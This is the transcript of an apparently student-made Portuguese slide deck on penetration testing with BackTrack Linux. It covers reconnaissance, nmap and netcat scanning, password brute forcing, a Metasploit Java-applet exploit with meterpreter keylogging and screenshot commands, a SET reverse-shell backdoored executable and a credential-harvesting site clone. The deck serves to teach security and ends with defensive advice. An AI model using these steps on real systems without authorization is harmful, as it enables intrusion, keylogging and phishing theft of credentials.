Back track apresentação

  • 573 views
Uploaded on

Este trabalho foi desenvolvido com a finalidade de abordar técnicas de defesas voltadas à segurança da informação, consistindo de uma atividade da cadeira de Segurança de Redes de Computadores da …

Este trabalho foi desenvolvido com a finalidade de abordar técnicas de defesas voltadas à segurança da informação, consistindo de uma atividade da cadeira de Segurança de Redes de Computadores da Universidade Católica de Pernambuco.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
573
On Slideshare
0
From Embeds
0
Number of Embeds
0

Actions

Shares
Downloads
31
Comments
0
Likes
0

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Kleber Santos
  • 2. Introdução
  • 3. Introdução O que é? • Ferramenta voltada para testes de penetração; • Primeira versão lançada em 2006; • Possui mais de 300 ferramentas para tais testes;
  • 4. Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link: http://www.backtrack-linux.org/
  • 5. Introdução Uso em Certificações • Todas oferecidas pela Offensive Security que mantém o BackTrack.
  • 6. Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link: http://www.backtrackbrasil.com.br/site/vd/
  • 7. Pentest • • • • Metodologia para testes de penetração; Simula ataques; Verifica a segurança de um sistema; Possibilita criação de mecanismos de defesa;
  • 8. Pentest • Procedimentos divididos em cinco etapas: 1. 2. 3. 4. 5. Obtenção de informações do alvo; Varreduras de sistema; Ganho de acesso ao sistema; Mantendo o acesso ao sistema; Retirada de evidencias; • Abordaremos as três primeiras etapas divididas em quatro partes;
  • 9. Pentest • Procedimentos divididos em cinco etapas: 1. 2. 3. 4. 5. Obtenção de informações do alvo; Varreduras de sistema; Ganho de acesso ao sistema; Mantendo o acesso ao sistema; Retirada de evidencias; • Abordaremos as três primeiras etapas divididas em quatro partes;
  • 10. Primeira Parte • • • • Obtenção de Informação; Detecção de Sistemas Ativos; Técnica Para Obter Informações DNS; FINGERPRINT;
  • 11. Obtenção de Informação • Metodologia usada para "reconhecimento do terreno"; • Pode ser de forma:  passiva (recursos na internet);  ativa (engenharia social);
  • 12. Detecção de Sistemas Ativos • Princípios básicos na obtenção de informações; • PING detecta hosts ativos;
  • 13. Detecção de Sistemas Ativos FPING:  Executa ping para diferentes hosts ao mesmo tempo através de um *.txt; HPING3:  Detecta hosts, regras de firewall e realiza varreduras de portas; Genlist:  Verifica uma lista de hosts ativos;
  • 14. Informações DNS • DNS traduz endereços de IP em nomes de domínio; • A ferramenta nslookup permite obter informações sobre DNS;
  • 15. Informações DNS DNSENUM:  Pesquisa de hosts, nomes de servidores, registros MX, IPs, etc. DNSMAP:  Descobre subdomínios relacionados ao domínio-alvo. Acompanha wordlist; DNSRECON:  Permite consultas reversas por faixas de IP, NS, SOA, registros MX, transferências de zonas e enumeração de serviços; FIERCE:  Retorna informações adicionais como HINFO, especificando o processador da máquina e o servidor;
  • 16. FINGERPRINT • Técnica na qual se obtém informações sobre sistema operacional; • O NMAP é utilizado para tal checagem de versões; root@bt~# nmap –O <ip_do_alvo>
  • 17. FINGERPRINT TCP SYN (-sS)  examina portas de maneira rápida e difícil de ser detectado por firewalls ou IDS; TCP Connect (-sT)  executa varredura utilizando o Three-Way Handshake; UDP (-sU)  possibilita varredura do protocolo UDP;
  • 18. FINGERPRINT TCP FIN (-sF, -sX, -sN)  utilizados na tentativa de travessia de firewalls; TCP ACK (-sA)  tática utilizada para detecção de regras de firewall; TCP Windows (-sW)  varreduras por janelas, parecido com o método ACK, porém consegue detectar portas abertas versus filtradas e não filtradas;
  • 19. Segunda Parte • SCANNING de portas • Detecção de Sistemas Ativos; • NETCAT – Canivete Suíço;
  • 20. SCANNING de portas • Port Scan é a técnica usada para descobrir serviços vulneráveis em um sistema; Scanning de portas:  identifica portas ativas; De vulnerabilidades:  identifica fraquezas no sistema; De redes:  identifica os hosts ativos;
  • 21. Detecção de Sistemas Ativos
  • 22. NETCAT – Canivete Suíço • Outra ferramenta possível para varreduras num host; root@root:~# nc -v -z 192.168.32.128 1-4000
  • 23. Terceira Parte • Fase de Enumeração; • HTTPRINT; • AMAP, SMTP e SMTPSCAN;
  • 24. Fase de Enumeração • Nesta fase o invasor tenta obter:     nomes de máquinas; usuários; serviços e versões; compartilhamentos, etc; • A ferramenta Nbtscan nos permite obter nome e endereço MAC de um alvo;
  • 25. Fase de Enumeração • Através do nmap podemos executar varredura procurando por serviços que utilizem o protocolo UDP: root@root~# nmap –T4 –sU –sV <ip_host_alvo>
  • 26. Fase de Enumeração • Obtendo retorno de serviços snmp podemos obter informações SNMP com o Snmpcheck: root@root:/pentest/enumeration/sn mp/snmpcheck# ./snmpcheck-1.8.pl –t <ip_host_alvo>
  • 27. HTTPRINT • Possibilita detectar versões de servidores; • Fornece opção de exporta-las para arquivos *.html, *.csv ou *.xml
  • 28. AMAP, SMTP e SMTPSCAN AMAP  tenta identificar aplicações rodando em portas diferentes da usual. SMTP e SMTPScan  busca usuários válidos do nosso host, destinando um IP alvo;
  • 29. Quarta Parte • Ganho de Acesso; • Abordagem à Força Bruta; • SET e Metasploit;
  • 30. Ganho de Acesso • Utiliza de ferramentas que explorem serviços como FTP e SSH; • Explora vulnerabilidades e senhas; • A técnica de engenharia social é extremamente importante em tal etapa;
  • 31. Força Bruta xHydra ou Hidra-GTK  Ferramenta utilizada para quebra de senhas ONLINE;  Suporta diversos protocolos;  Permite utilização de arquivos auxiliares para listas de usuários e senhas (wordlists);
  • 32. Força Bruta • Dicionários e força bruta são técnicas utilizadas para o password cracking; • Outras ferramentas para o mesmo intuito são:  Medusa;  John The Ripper; Todas elas inclusas no BackTrack 5 R3;
  • 33. Invadindo Sistemas com SET e Metasploit Metasploit  Conta com uma interface gráfica ARMITAGE e também a linha de comando, MSFCONSOLE; SET  Tem como alvo fraquezas e estupidez humanas;
  • 34. Invadindo Sistemas com SET e Metasploit • Através do comando msfconsole acessamos o Metasploit via linha de comando; • Configuraremos nossa máquina BackTrack para receber informações do alvo através de uma vulnerabilidade do Java;
  • 35. Invadindo Sistemas com SET e Metasploit
  • 36. Invadindo Sistemas com SET e Metasploit • root@bt:~# msfconsole • root@bt:~# search java • root@bt:~# use exploit/multi/browser/java_sign ed_applet • root@bt:~# show options
  • 37. Invadindo Sistemas com SET e Metasploit set srvhost <ip_local_host_backTrack> set srvport 80 #seta a porta 80 como acesso set uripath <caminho_para_link_url> set appletname <nome_para_o_arquivo_jar> exploit
  • 38. Invadindo Sistemas com SET e Metasploit • Após acessar a URL gerada o alvo permitirá acesso ao invasor; sessions –i 1 # dá acesso à máquina alvo sysinfo # obtém informações da máquina alvo
  • 39. Invadindo Sistemas com SET e Metasploit help # lista comandos do METERPRETER screenshot # obtém um print da tela da máquina invadida
  • 40. Invadindo Sistemas com SET e Metasploit keyscan_start # starta um sniffer para captura de navegação keyscan_dump # exibe informações capturadas
  • 41. Invadindo Sistemas com SET e Metasploit • Técnica semelhante pode ser explorada através da ferramenta SET gerando-se um payload; • Ao acessar a ferramenta, navega-se em: 1 – Social Engineering Attacks; 4 – Create a Payload na Listener;
  • 42. Invadindo Sistemas com SET e Metasploit • Deve-se informar o IP da máquina que receberá as informações obtidas através do payload (IP da máquina BackTrack); • Feito isso, navega-se em: 2 – Windows Reverse TCP Meterpreter; 16 – Backdoored Executable (BEST);
  • 43. Invadindo Sistemas com SET e Metasploit • Após informar a porta solicitada, ele gerará o arquivo executável: /pentest/exploits/set msf.exe • Confirma-se com yes o start do listener; • O acesso à máquina alvo se dará após a execução do arquivo pela mesma e executando: sessions –i 1.
  • 44. Invadindo Sistemas com SET e Metasploit • Com a mesma ferramenta SET, podemos clonar páginas web para obter informações de uma vítima através das opções: 1 2 3 2 – – – – Social Engineering Attacks; Website Attack Vectors; Credential Harvester Attack Vectors; Site Cloner;
  • 45. Invadindo Sistemas com SET e Metasploit • Informa-se a URL do site a ser clonado; • Acessa-se através do IP da máquina do atacante; Obs.: Podemos atribuir um domínio ao IP para facilitar o acesso pela vítima;
  • 46. Conclusão • Técnicas de invasão estão diretamente atreladas às vulnerabilidades dos sistemas e das pessoas
  • 47. Conclusão • • • • • Configurar devidamente servidores; Atualizar devidamente SOs e SWs; Utilização de senhas fortes; Desconfiar de coisas óbvias; Usufruir de uma política de segurança;
  • 48. Conclusão • Atentar à boas práticas voltadas à segurança nos dá uma garantia quanto ao CID;
  • 49. klebernox.wordpress.com/backtrackabordagem-a-seguranca-em-redes/
  • 50. Obrigado !